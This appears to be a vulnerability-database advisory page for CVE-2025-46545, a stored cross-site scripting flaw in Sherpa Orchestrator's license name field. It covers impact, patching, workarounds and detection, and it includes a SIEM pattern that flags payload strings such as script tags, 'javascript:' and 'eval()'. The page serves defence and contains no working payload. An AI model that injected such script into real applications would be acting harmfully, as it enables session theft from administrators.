CVE-2025-46545 – This vulnerability allows stored cross-site scr... (How to Fix)

Q: What is the severity of CVE-2025-46545?

CVE-2025-46545 has a CVSS score of 4.4 (MEDIUM). This vulnerability allows stored cross-site scripting (XSS) attacks in Sherpa Orchestrator version 141851. Administrators can inject malicious scripts through the license name parameter, which execute when the license expires. Only administrators with license management privileges are affected.

📋 TL;DR

This vulnerability allows stored cross-site scripting (XSS) attacks in Sherpa Orchestrator version 141851. Administrators can inject malicious scripts through the license name parameter, which execute when the license expires. Only administrators with license management privileges are affected.

💻 Affected Systems

Products:

Sherpa Orchestrator

Versions: 141851

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Requires administrator access to license management functionality.

📦 What is this software?

Sherpa Orchestrator by Sherparpa

View all CVEs affecting Sherpa Orchestrator →

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker with administrator credentials could steal session cookies, perform actions as the administrator, or redirect users to malicious sites when they view license information.

🟠

Likely Case

Privilege escalation within the application, session hijacking, or defacement of license management pages.

🟢

If Mitigated

Limited impact due to requiring administrator credentials and specific trigger condition (license expiration).

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires administrator credentials and knowledge of XSS payloads. Public proof-of-concept exists in GitHub gist.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://sherparpa.com

Restart Required: No

Instructions:

1. Check vendor advisory at sherparpa.com for updates. 2. Apply any available patches. 3. Validate fix by testing license name input sanitization.

🔧 Temporary Workarounds

Input Validation for License Names

all

Implement server-side validation to sanitize HTML/JavaScript from license name inputs

Implement input sanitization in license management code

Content Security Policy

all

Implement CSP headers to restrict script execution

Add Content-Security-Policy header to web server configuration

🧯 If You Can't Patch

Restrict administrator access to only trusted personnel
Monitor license management activities and audit logs for suspicious inputs

🔍 How to Verify

Check if Vulnerable:

Test if HTML/JavaScript can be injected into license name field and persists in the system

Check Version:

Check Sherpa Orchestrator version in administration panel or configuration files

Verify Fix Applied:

Verify that HTML/JavaScript input in license name field is properly sanitized and doesn't execute

📡 Detection & Monitoring

Log Indicators:

Unusual license name entries containing script tags or JavaScript
Multiple license updates from single administrator

Network Indicators:

HTTP requests with script payloads in license name parameters

SIEM Query:

Search for license management events with suspicious strings like <script>, javascript:, or eval()

📊 Metadata

CVE ID: CVE-2025-46545

CVSS v3 Score: 4.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.05% exploit probability (16.1th percentile)

Published: April 25, 2025

Last Updated: October 15, 2025

🔗 References

https://deiteriy.com Not Applicable
https://gist.github.com/ArtemBrylev/5a0c76285d5fa9daf4ec753034185de7 Third Party Advisory
https://sherparpa.com Product
https://twitter.com/ArtyomBrylev Not Applicable

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-46545, you might also want to check these: